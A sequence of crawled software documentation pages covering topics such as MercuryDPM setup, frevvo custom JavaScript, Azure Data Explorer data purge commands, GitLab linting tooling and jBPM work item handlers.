guideline is to define all parameters in one place (the main function), with the exception of the particles, walls and boundaries, so they can easily be found and changed later. You can start a new driver code by creating your own user directory. First, chose a UserName, then add a folder to the user directory and create a new source file, e.g. Example.cpp, which for convenience is copied here from the file Tutorial1.cpp. cd ~/MercurySource/Drivers/USER svn mkdir UserName cd UserName svn cp ../../Tutorials/Tutorial1.cpp Example.cpp Now write your code in the Example.cpp file. Note, you cannot yet execute your code, as the Makefiles in your build directory doesn't know about the new file. To update your Makefiles, use cmake. Note, the file name of your source file has to be unique, otherwise you get error messages. cd ~/MercuryBuild cmake . Now you can build and execute your new code: cd ~/MercuryBuild/Drivers/USER/UserName make Example Note, as we currently only support MercuryDPM on Linux/Mac OS, these instructions are only valid for such systems.
http://docs.mercurydpm.org/Trunk/d9/d71/DevelopersGuideDriver.html
2020-07-02T15:07:14
CC-MAIN-2020-29
1593655879532.0
[]
docs.mercurydpm.org
1. In your Menu area, tap the Grab a receipt icon. This will open up your phone's camera where you can take a photo of your receipt. 2. Tap Ok to use the photo or Retry to take another photo of your receipt. Please note: If you take a photo of multiple receipts, we cannot scan them. In addition, we will only scan receipts that have not yet been attached to an expense. You can skip the next steps but we would recommend adding these details as it will save you time once the expense is created: - 2. Add a memo to your receipt as this will populate the description box when you create the expense. 3. You can choose the Purchase Method of the expense. Tap Done to add that receipt to your account. The receipt will be sent to your. Create an expense from your receipt by tapping Expense. If you have any receipts that have been sent to your email address. You will want to check out our email-to-receipts feature to get those receipts sent to your account. Please note: If your finance team upload card statements on your behalf, do not create expenses from these receipts as you will create duplicates.
https://docs.expensein.com/en/articles/2039227-capture-a-receipt-mobile-app
2020-07-02T15:35:19
CC-MAIN-2020-29
1593655879532.0
[array(['https://downloads.intercomcdn.com/i/o/81898985/d81ed8c9f93d0a07daec00d0/Capture+receipts+1.png', None], dtype=object) array(['https://downloads.intercomcdn.com/i/o/109728602/2de3c5849cc3109af8743655/Receipt+memo.png', None], dtype=object) array(['https://downloads.intercomcdn.com/i/o/109728811/50a5d217999f14b23d93e95b/Unattached+receipt.png', None], dtype=object) array(['https://downloads.intercomcdn.com/i/o/81874981/b5bb4e018993fee9c6dceaf4/Capture+receipt+4.png', None], dtype=object) ]
docs.expensein.com
Date: Thu, 2 Jul 2020 15:33:33 +0000 (UTC) Message-ID: <[email protected]> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_21564_2083854200.1593704013768" ------=_Part_21564_2083854200.1593704013768 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: You can add custom behaviors by adding JavaScript to your form/flow. For= example, you may want to change the look of your form's submit button when= the user hovers the mouse over the button. It is possible to associat= e a custom JavaScript handler to any form control. See Custom JavaScript Examples= for sample code. Although JavaScript will accomplish the task, it is important to no= te that your scripts are not subjected to formal testing by the frevvo= quality assurance team. Choosing an approach that is part of the Live Forms product like Business Rules is a better choice than adding Jav= aScript since released versions undergo rigorous quality assurance testing.= Customizations using JavaScript should only be used under special sit= uations and if there is no other way to customize the form to the requireme= nts. For example, let's say you have a message control in your form that cont= ains markup to pull a custom JavaScript. The URL for the script contains th= e Live Forms home directory and revision= number - ( s/script.js). An upgrade of = Live Forms to new release or revision version could potentially stop= the form from working. If you choose to add JavaScript, we strongly recommend that you are fami= liar with a JavaScript debugger / web development tool such as the Firebug = extension for Firefox. On this page: You have the choice of three different approaches: Upload your custom JavaScript to Live F= orms via the Scripts tab on the left menu inside your applicati= on. Follow these steps: Your custom JavaScript must contain the comment // frevvo custo= m JavaScript as the first line of the file or the upload will not be s= uccessful. Here is an example of code that will add dashes to a Social Secu= rity number control as the user is typing it in. See Custom JavaScript Examples fo= r information on this sample code. Notice the JavaScript comment is the fir= st line in the script file. = Login to Live Forms as a des= igner user. Click the Edit icon for the application where you want to use th= e JavaScript. Click on the Script tab located on the left menu. Browse your hard drive for you script file, Click Upload. Your file = will be uploaded and it will display with the name Custom Script even thoug= h your script file may have another name. Be Aware that existing JavaScript= files will be overwritten... If you need to modify the script, you must download it, make your mo= difications and then upload it again. When you download the script by click= ing I= nformation form using an uploaded JavaScript to enter dashes in the Social = Security Number field while the user is entering the data. If your JavaScript does not behave as expected after upgrading your vers= ion so= lve the issue. Follow these steps to add JavaScript to your form using the Message cont= rol: Here is an example of the script tag: put your JavaScript inside th= e script tag. <sc= ript> /* <![CDATA[ */ code goes here /* ]]> */ </script>=20 Add JavaScript to the WEB-INF/rules/includes.js file located in the= <frevvo-home>\tomcat\webapps\frevvo.war. Includes.js is only for including javascript into rules that run se= rver-side. The contents of this file are included in the Rule Execut= ion when the context initializes. You can add any JS that you want with the following caveats: Follow these steps to add JavaScript to the includes.js file: Rezip all the files in the c:\tmp\frevvo-war directory, even the one= s you did not edit =E2=80=94 if you change directories or zip them differen= tly, Live Forms may not load correctly. Here is an example of a snippet of code when added to the include.js wil= l allow you to do something like this in= a rule: DateControl?.value =3D= MyUtil?.today(); var MyU= til =3D { today: function() { var d =3D new Date(); var dd =3D d.getDate(); if (dd < 10) dd =3D '0' + dd; var mm =3D d.getMonth() + 1; if (mm < 10) mm =3D '0' + mm; var yyyy =3D d.getFullYear(); return String(mm + "-" + dd + "-" + yyyy); } }=20 If you wish to inject client-side scr= ipt, should not assume the availabilit= y of JavaScript libraries in your= Custom Javascript handlers. Functions should be part of the standard JavaS= cript environment. A good reference for what is and is not in standard Java= Script can be found here: (= Core Javascript) and here: (bro= wser DOM reference). You can call any JavaScript code in a handler; you can access the DOM of= the page (note that you only have access to the DOM of the iframe in which= the form is rendered assuming you're using a standard embedding) or call e= xternal code. In addition, you have access to the following methods: Here is an example of a custom event handler: var Cus= tomEventHandlers =3D { =20 setup: function (el) { =20 if (CustomView.hasClass(el, 's-submit')) =20 FEvent.observe(el, 'click', this.submitClicked.bindAsObserver(t= his,el)); else if (CustomView.hasClass(el, 'my-class')) =20 FEvent.observe(el, 'change', this.myHandler.bindAsObserver(this= ,el)); =20 }, =20 submitClicked: function (evt, el) { =20 alert ('Submit button was clicked'); =20 }, =20 myHandler: function (evt, el) { =20 alert ('My Class change handler called'); =20 }, =20 onSaveSuccess: function (submissionId) { =20 alert ("Save complete. New submission id is: " + submissionId); = =20 }, =20 onSaveFailure: function () { =20 alert ("Save failed"); =20 }=20 }=20 Let's look in a little more detail You can add different event handling to your JavaScript code. This examp= le handles click, mouseover and mouseout events to the Submit button: /* =20 * Custom Javascript here. =20 */ =20 var CustomEventHandlers =3D { =20 setup: function (el) { =20 if (CustomView.hasClass(el, 's-submit')) =20 { =20 alert('setting up s-submit events'); =20 FEvent.observe(el, 'click', this.submitClicked.bindAsObserver(t= his,el)); =20 FEvent.observe(el, 'mouseover', this.submitMouseOver.bindAsObse= rver(this,el)); =20 FEvent.observe(el, 'mouseout', this.submitMouseOut.bindAsObserv= er(this,el)); =20 } =20 }, =20 submitClicked: function (evt, el) { =20 alert ('Submit button was clicked'); =20 }, =20 submitMouseOver: function (event, element) { =20 alert ('Submit mouse over'); =20 }, =20 submitMouseOut: function (event, element) { =20 alert ('Submit mouse out'); =20 }=20 }=20 In addition to the above, flows also support a few other methods. var Cus= tomFlowEventHandlers =3D { =20 onNextClicked: function (name, id) { =20 alert ("Next button clicked for activity: " + name); =20 }, =20 onNavClicked: function (name, id) { =20 alert ("Nav button clicked for activity: " + name); =20 }, =20 onSaveSuccess: function (submissionId) { =20 alert ("Save complete. New submission id is: " + submissionId); = =20 }, =20 onSaveFailure: function () { =20 alert ("Save failed"); =20 } =20 }=20 As the method names indicate It's not currently possible to directly fire a custom.js handler from a = business rule. You can write a form.load rule that sets the value of a hidd= en control and set a change handler for that control in your custom.js Cust= om Handlers.
https://docs.frevvo.com/d/exportword?pageId=19795779
2020-07-02T15:33:33
CC-MAIN-2020-29
1593655879532.0
[]
docs.frevvo.com
Data purge. As a data platform, Azure Data Explorer supports the ability to delete individual records, through the use of Kusto .purge and related commands. You can also purge an entire table. Warning Data deletion through the .purge command is designed to be used to protect personal data and should not be used in other scenarios. It is not designed to support frequent delete requests, or deletion of massive quantities of data, and may have a significant performance impact on the service. Purge guidelines Carefully design your data schema and investigate relevant policies before storing personal data in Azure Data Explorer. - In a best-case scenario, the retention period on this data is sufficiently short and data is automatically deleted. - If retention period usage isn't possible, isolate all data that is subject to privacy rules in a small number of Azure Data Explorer tables. Optimally, use just one table and link to it from all other tables. This isolation allows you to run the data purge process on a small number of tables holding sensitive data, and avoid all other tables. - The caller should make every attempt to batch the execution of .purgecommands to 1-2 commands per table per day. Don't issue multiple commands with unique user identity predicates. Instead, send a single command whose predicate includes all user identities that require purging. Purge process The process of selectively purging data from Azure Data Explorer happens in the following steps: - Phase 1: Give an input with an Azure Data Explorer table name and a per-record predicate, indicating which records to delete. Kusto scans the table looking to identify data shards that would participate in the data purge. The shards identified are those having one or more records for which the predicate returns true. - Phase 2: (Soft Delete) Replace each data shard in the table (identified in step (1)) with a reingested version. The reingested version shouldn't have the records for which the predicate returns true. If new data is not being ingested into the table, then by the end of this phase, queries will no longer return data for which the predicate returns true. The duration of the purge soft delete phase depends on the following parameters: - The number of records that must be purged - Record distribution across the data shards in the cluster - The number of nodes in the cluster - The spare capacity it has for purge operations - Several other factors The duration of phase 2 can vary between a few seconds to many hours. - Phase 3: (Hard Delete) Work back all storage artifacts that may have the "poison" data, and delete them from storage. This phase is done at least five days after the completion of the previous phase, but no longer than 30 days after the initial command. These timelines are set to follow data privacy requirements. Issuing a .purge command triggers this process, which takes a few days to complete. If the density of records for which the predicate applies is sufficiently large, the process will effectively reingest all the data in the table. This reingestion has a significant impact on performance and COGS. Purge limitations and considerations The purge process is final and irreversible. It isn't possible to undo this process or recover data that has been purged. Commands such as undo table drop can't recover purged data. Rollback of the data to a previous version can't go to before the latest purge command. Before running the purge, verify the predicate by running a query and checking that the results match the expected outcome. You can also use the two-step process that returns the expected number of records that will be purged. The .purgecommand is executed against the Data Management endpoint:-[YourClusterName].[region].kusto.windows.net. The command requires database admin permissions on the relevant databases. Due to the purge process performance impact, and to guarantee that purge guidelines have been followed, the caller is expected to modify the data schema so that minimal tables include relevant data, and batch commands per table to reduce the significant COGS impact of the purge process. The predicateparameter of the .purge command is used to specify which records to purge. Predicatesize is limited to 63 KB. When constructing the predicate: - Use the 'in' operator, for example, where [ColumnName] in ('Id1', 'Id2', .. , 'Id1000'). - Note the limits of the 'in' operator (list can contain up to 1,000,000values). - If the query size is large, use externaldataoperator, for example where UserId in (externaldata(UserId:string) ["?..."]). The file stores the list of IDs to purge. - The total query size, after expanding all externaldatablobs (total size of all blobs), can't exceed 64 MB. Purge performance Only one purge request can be executed on the cluster, at any given time. All other requests are queued in Scheduled state. Monitor the purge request queue size, and keep within adequate limits to match the requirements applicable for your data. To reduce purge execution time: Follow the purge guidelines to decrease the amount of purged data. Adjust the caching policy since purge takes longer on cold data. Scale out the cluster Increase cluster purge capacity, after careful consideration, as detailed in Extents purge rebuild capacity. Changing this parameter requires opening a support ticket Trigger the purge process Note Purge execution is invoked by running purge table TableName records command on the Data Management endpoint-[YourClusterName].[Region].kusto.windows.net. Purge table TableName records command Purge command may be invoked in two ways for differing usage scenarios: Programmatic invocation: A single step that is intended to be invoked by applications. Calling this command directly triggers purge execution sequence. Syntax // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" .purge table [TableName] records in database [DatabaseName] with (noregrets='true') <| [Predicate] Note Generate this command by using the CslCommandGenerator API, available as part of the Kusto Client Library NuGet package. Human invocation: A two-step process that requires an explicit confirmation as a separate step. First invocation of the command returns a verification token, which should be provided to run the actual purge. This sequence reduces the risk of inadvertently deleting incorrect data. Using this option may take a long time to complete on large tables with significant cold cache data. Syntax // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" // Step #1 - retrieve a verification token (no records will be purged until step #2 is executed) .purge table [TableName] records in database [DatabaseName] <| [Predicate] // Step #2 - input the verification token to execute purge .purge table [TableName] records in database [DatabaseName] with (verificationtoken='<verification token from step #1>') <| [Predicate] Purge predicate limitations - The predicate must be a simple selection (for example, where [ColumnName] == 'X' / where [ColumnName] in ('X', 'Y', 'Z') and [OtherColumn] == 'A'). - Multiple filters must be combined with an 'and', rather than separate whereclauses (for example, where [ColumnName] == 'X' and OtherColumn] == 'Y'and not where [ColumnName] == 'X' | where [OtherColumn] == 'Y'). - The predicate can't reference tables other than the table being purged (TableName). The predicate can only include the selection statement ( where). It can't project specific columns from the table (output schema when running ' table| Predicate' must match table schema). - System functions (such as, ingestion_time(), extent_id()) aren't supported. Example: Two-step purge To start purge in a two-step activation scenario, run step #1 of the command: ```kusto // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" .purge table MyTable records in database MyDatabase <| where CustomerId in ('X', 'Y') ``` **Output** | NumRecordsToPurge | EstimatedPurgeExecutionTime| VerificationToken |--|--|-- | 1,596 | 00:00:02 | e43c7184ed22f4f23c7a9d7b124d196be2e570096987e5baadf65057fa65736b Then, validate the NumRecordsToPurge before running step #2. To complete a purge in a two-step activation scenario, use the verification token returned from step #1 to run step #2: ```kusto .purge table MyTable records in database MyDatabase with (verificationtoken='e43c7184ed22f4f23c7a9d7b124d196be2e570096987e5baadf65057fa65736b') <| where CustomerId in ('X', 'Y') ``` **Output** | `OperationId` | `DatabaseName` | `TableName`|`ScheduledTime` | `Duration` | `LastUpdatedOn` |`EngineOperationId` | `State` | `StateDetails` |`EngineStartTime` | `EngineDuration` | `Retries` |`ClientRequestId` | `Principal`| |--|--|--|--|--|--|--|--|--|--|--|--|--|--| | c9651d74-3b80-4183-90bb-bbe9e42eadc4 |MyDatabase |MyTable |2019-01-20 11:41:05.4391686 |00:00:00.1406211 |2019-01-20 11:41:05.4391686 | |Scheduled | | | |0 |KE.RunCommand;1d0ad28b-f791-4f5a-a60f-0e32318367b7 |AAD app id=...| Example: Single-step purge To trigger a purge in a single-step activation scenario, run the following command: ```kusto // Connect to the Data Management service #connect "-[YourClusterName].[region].kusto.windows.net" .purge table MyTable records in database MyDatabase with (noregrets='true') <| where CustomerId in ('X', 'Y') ``` Output Cancel purge operation command If needed, you can cancel pending purge requests. Note This operation is intended for error recovery scenarios. It isn't guaranteed to succeed, and shouldn't be part of a normal operational flow. It can only be applied to in-queue requests (not yet dispatched to the engine node for execution). The command is executed on the Data Management endpoint. Syntax .cancel purge <OperationId> Example .cancel purge aa894210-1c60-4657-9d21-adb2887993e1 Output The output of this command is the same as the 'show purges OperationId' command output, showing the updated status of the purge operation being canceled. If the attempt is successful, the operation state is updated to Abandoned. Otherwise, the operation state isn't changed. Track purge operation status Note Purge operations can be tracked with the show purges command, executed against the Data Management endpoint-[YourClusterName].[region].kusto.windows.net. Status = 'Completed' indicates successful completion of the first phase of the purge operation, that is records are soft-deleted and are no longer available for querying. Customers aren't expected to track and verify the second phase (hard-delete) completion. This phase is monitored internally by Azure Data Explorer. Show purges command Show purges command shows purge operation status by specifying the operation ID within the requested time period. .show purges <OperationId> .show purges [in database <DatabaseName>] .show purges from '<StartDate>' [in database <DatabaseName>] .show purges from '<StartDate>' to '<EndDate>' [in database <DatabaseName>] Note Status will be provided only on databases that client has Database admin permissions. Examples .show purges .show purges c9651d74-3b80-4183-90bb-bbe9e42eadc4 .show purges from '2018-01-30 12:00' .show purges from '2018-01-30 12:00' to '2018-02-25 12:00' .show purges from '2018-01-30 12:00' to '2018-02-25 12:00' in database MyDatabase Output OperationId- the DM operation ID returned when executing purge. DatabaseName** - database name (case sensitive). TableName- table name (case sensitive). ScheduledTime- time of executing purge command to the DM service. Duration- total duration of the purge operation, including the execution DM queue wait time. EngineOperationId- the operation ID of the actual purge executing in the engine. State- purge state, can be one of the following values: Scheduled- purge operation is scheduled for execution. If job remains Scheduled, there's probably a backlog of purge operations. See purge performance to clear this backlog. If a purge operation fails on a transient error, it will be retried by the DM and set to Scheduled again (so you may see an operation transition from Scheduled to InProgress and back to Scheduled). InProgress- the purge operation is in-progress in the engine. Completed- purge completed successfully. BadInput- purge failed on bad input and won't be retried. This failure may be due to various issues such as a syntax error in the predicate, an illegal predicate for purge commands, a query that exceeds limits (for example, over 1M entities in an externaldataoperator or over 64 MB of total expanded query size), and 404 or 403 errors for externaldatablobs. Failed- purge failed and won't be retried. This failure may happen if the operation was waiting in the queue for too long (over 14 days), due to a backlog of other purge operations or a number of failures that exceed the retry limit. The latter will raise an internal monitoring alert and will be investigated by the Azure Data Explorer team. StateDetails- a description of the State. EngineStartTime- the time the command was issued to the engine. If there's a large difference between this time and ScheduledTime, there's usually a significant backlog of purge operations and the cluster is not keeping up with the pace. EngineDuration- time of actual purge execution in the engine. If purge was retried several times, it's the sum of all the execution durations. Retries- number of times the operation was retried by the DM service due to a transient error. ClientRequestId- client activity ID of the DM purge request. Principal- identity of the purge command issuer. Purging an entire table Purging a table includes dropping the table, and marking it as purged so that the hard delete process described in Purge process runs on it. Dropping a table without purging it doesn't delete all its storage artifacts. These artifacts are deleted according to the hard retention policy initially set on the table. The purge table allrecords command is quick and efficient and is preferable to the purge records process, if applicable for your scenario. Note The command is invoked by running the purge table TableName allrecords command on the Data Management endpoint-[YourClusterName].[region].kusto.windows.net. Purge table TableName allrecords command Similar to '.purge table records ' command, this command can be invoked in a programmatic (single-step) or in a manual (two-step) mode. Programmatic invocation (single-step): Syntax // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" .purge table [TableName] in database [DatabaseName] allrecords with (noregrets='true') Human invocation (two-steps): Syntax // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" // Step #1 - retrieve a verification token (the table will not be purged until step #2 is executed) .purge table [TableName] in database [DatabaseName] allrecords // Step #2 - input the verification token to execute purge .purge table [TableName] in database [DatabaseName] allrecords with (verificationtoken='<verification token from step #1>') Example: Two-step purge To start purge in a two-step activation scenario, run step #1 of the command: // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" .purge table MyTable in database MyDatabase allrecords Output To complete a purge in a two-step activation scenario, use the verification token returned from step #1 to run step #2: .purge table MyTable in database MyDatabase allrecords with (verificationtoken='eyJTZXJ2aWNlTmFtZSI6IkVuZ2luZS1pdHNhZ3VpIiwiRGF0YWJhc2VOYW1lIjoiQXp1cmVTdG9yYWdlTG9ncyIsIlRhYmxlTmFtZSI6IkF6dXJlU3RvcmFnZUxvZ3MiLCJQcmVkaWNhdGUiOiIgd2hlcmUgU2VydmVyTGF0ZW5jeSA9PSAyNSJ9') The output is the same as the '.show tables' command output (returned without the purged table). Output Example: Single-step purge To trigger a purge in a single-step activation scenario, run the following command: // Connect to the Data Management service #connect "-[YourClusterName].[Region].kusto.windows.net" .purge table MyTable in database MyDatabase allrecords with (noregrets='true') The output is the same as the '.show tables' command output (returned without the purged table). Output
https://docs.microsoft.com/en-us/azure/data-explorer/kusto/concepts/data-purge
2020-07-02T15:28:08
CC-MAIN-2020-29
1593655879532.0
[]
docs.microsoft.com
Released on: Tuesday, September 24, 2019 - 10:00 New in this release - Updated instrumentation to include Fragment and Activity classes derived from androidxsupport packages. - Updated 3rd party licenses information. Fixed in this release - Fixed crash that occurred when the agent tried to instrument Kotlin module_info.class files. - Updated JSON instrumentation to address crash that could occur when using R8 tools.
https://docs.newrelic.com/docs/release-notes/mobile-release-notes/android-release-notes/android-5240
2020-07-02T17:06:11
CC-MAIN-2020-29
1593655879532.0
[]
docs.newrelic.com
Button The Button Block can work as event trigger, status switcher, or counter. Real-Life Examples - The power button is used to turn on or turn off the laptop - The Home button of iPhone is used to lock or unlock the screen - The buttons of the mouse can recorder the time of being clicked Parameters - Size: 24×20mm - Life span: 100,000 times - Operating current: 15mA
http://docs.makeblock.com/diy-platform/en/mbuild/hardware/interaction/button.html
2020-07-02T17:03:39
CC-MAIN-2020-29
1593655879532.0
[array(['../../../../zh/mbuild/hardware/interaction/images/button.png', None], dtype=object) ]
docs.makeblock.com
This topic describes the structure of the source code distribution. The source code for the Alfresco Mobile SDK for iOS, which can be checked out of the GitHub repository, contains the AlfrescoSDK directory. The AlfrescoSDK directory contains the following files and sub-directories - AlfrescoSDK - containing the main source code - AlfrescoSDK.xcodeproj - the Xcode project to build the SDK - AlfrescoSDKTests - unit tests - CMIS - the CMIS library source code - scripts - scripts to build the library, documentation, and run unit tests. - build - built files, such as static libraries and API documentation go here. - LICENSE, NOTICE and README. These contain the Apache License details, the Alfresco copyright notice and information regarding the release.
https://docs.alfresco.com/mobile_sdk/ios/concepts/source-distribution.html
2020-11-24T02:53:22
CC-MAIN-2020-50
1606141171077.4
[]
docs.alfresco.com
It’s possible to hook up a centralized user data store with Alfresco Process Services. Any server supporting the LDAP protocol can be used. Special configuration options and logic has been included to work with Active Directory (AD) systems too. From a high-level overview, the external Identity Management (IDM) integration works as follows: Periodically, all user and group information is synchronized asynchronously. This means that all data for users (name, email address, group membership and so on) is copied to the Alfresco Process Services database. This is done to improve performance and to efficiently store more user data that doesn’t belong to the IDM system. If the user logs in to Alfresco Process Services, the authentication request is passed to the IDM system. On successful authentication there, the user data corresponding to that user is fetched from the Alfresco Process Services database and used for the various requests. Note that no passwords are saved in the database when using an external IDM. Note that the LDAP sync only needs to be activated and configured on one node in the cluster (but it works when activated on multiple nodes, but this will of course lead to higher traffic for both the LDAP system and the database).
https://docs.alfresco.com/process-services1.6/topics/externalIdentityManagement.html
2020-11-24T03:44:45
CC-MAIN-2020-50
1606141171077.4
[]
docs.alfresco.com
Raised Events Raised events are events in masters that you "raise" up out of the master to be accessible at the page level. This allows you to configure actions under the event that target widgets outside the master. It also allows you to configure different actions under the event for each instance of the master. Raising an EventRaising an Event Open a master on the canvas. Select a widget in the master whose event you want to raise. You can also click a blank spot on the canvas to work with the master's own page events. In the Interactions pane, click New Interaction and select the event you want to raise. At the bottom of the action list, select Raise Event. Click Add to create a new raised event, and give it a descriptive name. Alternatively, you can select from the list of raised events you've previously created in this master. Note You can manage all the raised events in the master you're currently editing by going to Arrange → Manage Raised Events. Click OK. You can now access the raised event from pages you've added instances of the master to. Using a Raised EventUsing a Raised Event Once you've created a raised event in a master, each instance of that master will have its own version of the raised event that you can configure at the page-level. Select an instance of a master and click New Interaction in the Interactions pane to access its raised events.
https://docs.axure.com/axure-rp/reference/raised-events/
2020-11-24T03:27:20
CC-MAIN-2020-50
1606141171077.4
[array(['/assets/screenshots/axure-rp/raised-events1.png', None], dtype=object) array(['/assets/screenshots/axure-rp/raised-events2.png', None], dtype=object) ]
docs.axure.com
Payment methods represent the type of payment sources (e.g., Credit Card, PayPal, or Apple Pay) offered in a market. They can have a price and must be present before placing an order. A payment method object is returned as part of the response body of each successful create, list, retrieve, or update API call.
https://docs.commercelayer.io/api/resources/payment_methods
2020-11-24T03:37:07
CC-MAIN-2020-50
1606141171077.4
[]
docs.commercelayer.io
Computer features: Form SettingsForm Settings When you first create a form, the Property Editor (right column) will display overall setting for your form. You can get back here to adjust these details at any time by clicking the Form Settings button. - Status # - The default status to be used when users submit the form, unless overwritten at template level. - See Statuses documentationfor managing statuses. - Return URL # - The URL that the form will redirect to after successful submit. - May contain {{ form.handle }}and/or {{ submission.id }}to parse the newly created unique submission ID in the URL. This would allow you to use the freeform.submissionstemplate function to display some or all of the users' submission on the success page. - Notify button).._4<< Layout (center column)Layout (center column) The center column is where all the magic happens. It's where you can actively see an interactive live preview of what your form will look like. You 9 pages for each form. Property Editor (right column)Property Editor (right column) The Property Editor controls every aspect of your form. Clicking on any field, page tab or form settings button inside Composer layout area will load its configuration options here. CRM API IntegrationsCR.
https://docs.solspace.com/craft/freeform/v1/overview/forms-composer.html
2020-11-24T04:14:36
CC-MAIN-2020-50
1606141171077.4
[array(['/assets/img/cp_forms.5eb3bb10.png', 'Forms'], dtype=object) array(['/assets/img/cp_forms-composer-contact.5e0a8a62.png', 'Composer - Contact Form'], dtype=object) array(['/assets/img/cp_forms-composer-dragdrop.3ad5c898.png', 'Composer - Drag & Drop'], dtype=object) array(['/assets/img/cp_forms-composer-multipage.5af168e7.png', 'Composer - Multi-page'], dtype=object) array(['/assets/img/cp_forms-composer-mailinglist.33136dd5.png', 'Composer - Mailing List'], dtype=object) ]
docs.solspace.com
- ESLint - Formatting with Prettier Tooling ESLint We use ESLint to encapsulate and enforce frontend code standards. Our configuration may be found in the gitlab-eslint-config project. Yarn Script This section describes yarn scripts that are available to validate and apply automatic fixes to files using ESLint. To check all currently staged files (based on git diff) with ESLint, run the following script: yarn eslint-staged A list of problems found will be logged to the console. To apply automatic ESLint fixes to all currently staged files (based on git diff), run the following script: yarn eslint-staged-fix If manual changes are required, a list of changes will be sent to the console. To check all files in the repository with ESLint, run the following script: yarn eslint A list of problems found will be logged to the console. To apply automatic ESLint fixes to all files in the repository, run the following script: yarn eslint-fix If manual changes are required, a list of changes will be sent to the console. Disabling ESLint in new files Do not disable ESLint when creating new files. Existing files may have existing rules disabled due to legacy compatibility reasons but they are in the process of being refactored. Do not disable specific ESLint rules. To avoid introducing technical debt, you may disable the following rules only if you are invoking/instantiating existing code modules. Disable these rules on a per-line basis. This makes it easier to refactor in the future. For example, use eslint-disable-next-line or eslint-disable-line. Disabling ESLint for a single violation If you do need to disable a rule for a single violation, disable it for the smallest amount of code necessary: // bad /* eslint-disable no-new */ import Foo from 'foo'; new Foo(); // better import Foo from 'foo'; // eslint-disable-next-line no-new new Foo(); The no-undef rule and declaring globals Never disable the no-undef rule. Declare globals with /* global Foo */ instead. When declaring multiple globals, always use one /* global [name] */ line per variable. // bad /* globals Flash, Cookies, jQuery */ // good /* global Flash */ /* global Cookies */ /* global jQuery */ Formatting with Prettier Support for .graphql introduced in GitLab 13.2. Our code is automatically formatted with Prettier to follow our style guides. Prettier is taking care of formatting .js, .vue, .graphql, and .scss files based on the standard prettier rules. You can find all settings for Prettier in .prettierrc. Editor The recommended method to include Prettier in your workflow is to set up your preferred editor (all major editors are supported) accordingly. We suggest setting up Prettier to run when each file is saved. For instructions about using Prettier in your preferred editor, see the Prettier documentation. Please take care that you only let Prettier format the same file types as the global Yarn script does ( .js, .vue, .graphql, and .scss). In VSCode by example you can easily exclude file formats in your settings file: "prettier.disableLanguages": [ "json", "markdown" ] Yarn Script The following yarn scripts are available to do global formatting: yarn prettier-staged-save Updates all currently staged files (based on git diff) with Prettier and saves the needed changes. yarn prettier-staged Checks all currently staged files (based on git diff) with Prettier and log which files would need manual updating to the console. yarn prettier-all Checks all files with Prettier and logs which files need manual updating to the console. yarn prettier-all-save Formats all files in the repository with Prettier. (This should only be used to test global rule updates otherwise you would end up with huge MR’s). The source of these Yarn scripts can be found in /scripts/frontend/prettier.js. Scripts during Conversion period node ./scripts/frontend/prettier.js check-all ./vendor/ This will go over all files in a specific folder check it. node ./scripts/frontend/prettier.js save-all ./vendor/ This will go over all files in a specific folder and save it. VSCode Settings Select Prettier as default formatter To select Prettier as a formatter, add the following properties to your User or Workspace Settings: { "[html]": { "editor.defaultFormatter": "esbenp.prettier-vscode" }, "[javascript]": { "editor.defaultFormatter": "esbenp.prettier-vscode" }, "[vue]": { "editor.defaultFormatter": "esbenp.prettier-vscode" }, "[graphql]": { "editor.defaultFormatter": "esbenp.prettier-vscode" } } Format on Save To automatically format your files with Prettier, add the following properties to your User or Workspace Settings: { "[html]": { "editor.formatOnSave": true }, "[javascript]": { "editor.formatOnSave": true }, "[vue]": { "editor.formatOnSave": true }, "[graphql]": { "editor.formatOnSave": true }, }
https://docs.gitlab.com/ee/development/fe_guide/tooling.html
2020-11-24T03:57:30
CC-MAIN-2020-50
1606141171077.4
[]
docs.gitlab.com
JBoss.orgCommunity: With regards to a BPMN2 process, custom work items are certain types of <task> nodes. In most cases, custom work items are <task> nodes in a BPMN2 process definition, although they can also be used with certain other task type nodes such as, among others, <serviceTask> or <sendTask> nodes. When creating custom work items, it's important to separate the data associated with the work item, from how the work item should be handled. In other words, separate the what from the how. That means that custom work items should be: On the other hand, custom work item handlers, which are java classes, should be: Work item handlers should almost never contain any data. Users can thus easily define their own set of domain-specific service nodes and integrate them with the process language. For example, the next figure shows an example of a healtchare-related BPMN2 process. The process includes domain-specific service nodes for measuring blood pressure, prescribing medication, notifying care providers and following-up on the patient. Before moving on to an example, this section explains what custom work items and custom work item handlers are. In short, we use the term custom work item when we're describing a node in your process that represents a domain-specific task and as such, contains extra properties and is handled by a WorkItemHandler implementation. Because it's a domain-specific task, that means that a custom work item is equivalent to a <task> or <task>-type node in BPMN2. However, a WorkItem is also Java class instance that's used when a WorkItemHandler instance is called to complete the task or work item. Depending on the BPMN2 editor you're using, you can create a custom work item definition in one of two ways: <task>or <task>-type element to work with WorkItemHandlerimplementations. See the ??? section in the ??? chapter. A work item handler is a Java class used to execute (or abort) work items. That also means that the class implements the org.kie.runtime.instance.WorkItemHandler interface. While jBPM provides some custom WorkItemHandler instances (listed below), a Java developer with a minimal knowledge of jBPM can easily create a new work item handler class with it's own custom business logic. Among others, jBPM offers the following WorkItemHandler implementations: jbpm-bpmn2module, org.jbpm.bpmn2.handlerpackage: <receiveTask>) <sendTask>) <serviceTask>) jbpm-workitemsmodule, in various packages under the org.jbpm.process.workitempackage: There are a many more WorkItemHandler implementations present in the jbpm-workitems module. If you're looking for specific integration logic with Twitter, for example, we recommend you take a look at the classes made available there. In general, a WorkItemHandler's .executeWorkItem(...) and .abortWorkItem(...) methods will do the following: WorkIteminstance WorkItemManagerinstance passed to the method: WorkItemManager.completeWorkItem(long workItemId, Map<String, Object> results) WorkItemManager.abortWorkItem(long workItemId) In order to make sure that your custom work item handler is used for a particular process instance, it's necessary to register the work item handler before starting the process. This makes the engine aware of your WorkItemHandler so that the engine can use it for the proper node. For example: ksession.getWorkItemManager().registerWorkItemHandler("Notification", new NotificationWorkItemHandler()); The ksession variable above is a 